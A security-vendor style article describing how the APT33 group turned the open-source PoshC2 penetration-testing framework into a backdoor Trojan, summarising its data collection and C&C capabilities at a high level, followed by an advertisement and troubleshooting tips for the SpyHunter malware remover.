Cybersecurity experts have been using a tool called POSHC2 to make sure that the networks they are administrating are safe from cyber-attacks. POSHC2 is an exploitation framework that helps penetration testers in particular. However, the POSHC2 framework is a free tool, and all of its source code is available to anyone who is interested freely. Naturally, this has attracted the attention of cyber crooks who have altered the code of the framework slightly and managed to turn it into a fully weaponized hacking tool. These threatening variants of the POSHC2 framework can be used to target companies and individuals alike.
Operations Targeting Major Industries
Among the con actors who are taking advantage of the weaponized POSHC2 framework is the APT33 (Advanced Persistent Threat) group. They also are known under the alias Elfin Team. This hacking group is known to be located in Iran, and they have been launching campaigns targeting businesses and institutions in the United States, South Korea and Saudi Arabia. It would appear the APT33 acquired a taste for the POSHC2 framework, as they had been using it in numerous campaigns in 2018. Two of their targets were aviation and engineering industries. The hacking group has set up a timer that would terminate the activity of the weaponized variant of the POSHC2 framework on July 29, 2018. Not many con actors take this measure, but some prefer to be on the safe side and leave fewer traces for cybersecurity experts.
Operates as a Backdoor Trojan
The POSHC2 framework has been turned into what is a backdoor Trojan essentially. This means that this threat can almost operate as a regular backdoor Trojan. Once it compromises a target, the POSHC2 backdoor will begin collecting information about the host's system hardware, software, username, PC name and the Process ID of the threat. All the collected information will then be exfiltrated to the C&C (Command & Control) server of the operators of the POSHC2 backdoor. The POSHC2 backdoor can receive remote commands from the C&C server. With the help of the C&C server, the POSHC2 backdoor also is capable of downloading and executing additional malware on the compromised machine. Furthermore, this iteration of the POSHC2 framework also can execute PowerShell commands.
It is not uncommon for cyber crooks to hijack a legitimate application and weaponize it. Businesses need to take their cybersecurity more seriously.
Do You Suspect Your PC May Be Infected with POSHC2 & Other Threats? Scan Your PC with SpyHunterSpyHunter is a powerful malware remediation and protection tool designed to help provide PC users with in-depth system security analysis, detection and removal of a wide range of threats like POSHC2 as well as a one-on-one tech support service. Download SpyHunter's FREE Malware Remover
Security Doesn't Let You Download SpyHunter or Access the Internet?Solutions: Your computer may have malware hiding in memory that prevents any program, including SpyHunter, from executing on your computer. Follow to download SpyHunter and gain access to the Internet:
- Use an alternative browser. Malware may disable your browser. If you're using IE, for example, and having problems downloading SpyHunter, you should open Firefox, Chrome or Safari browser instead.
- Use a removable media. Download SpyHunter on another clean computer, burn it to a USB flash drive, DVD/CD, or any preferred removable media, then install it on your infected computer and run SpyHunter's malware scanner.
- Start Windows in Safe Mode. If you can not access your Window's desktop, reboot your computer in "Safe Mode with Networking" and install SpyHunter in Safe Mode.
- IE Users: Disable proxy server for Internet Explorer to browse the web with Internet Explorer or update your anti-spyware program. Malware modifies your Windows settings to use a proxy server to prevent you from browsing the web with IE.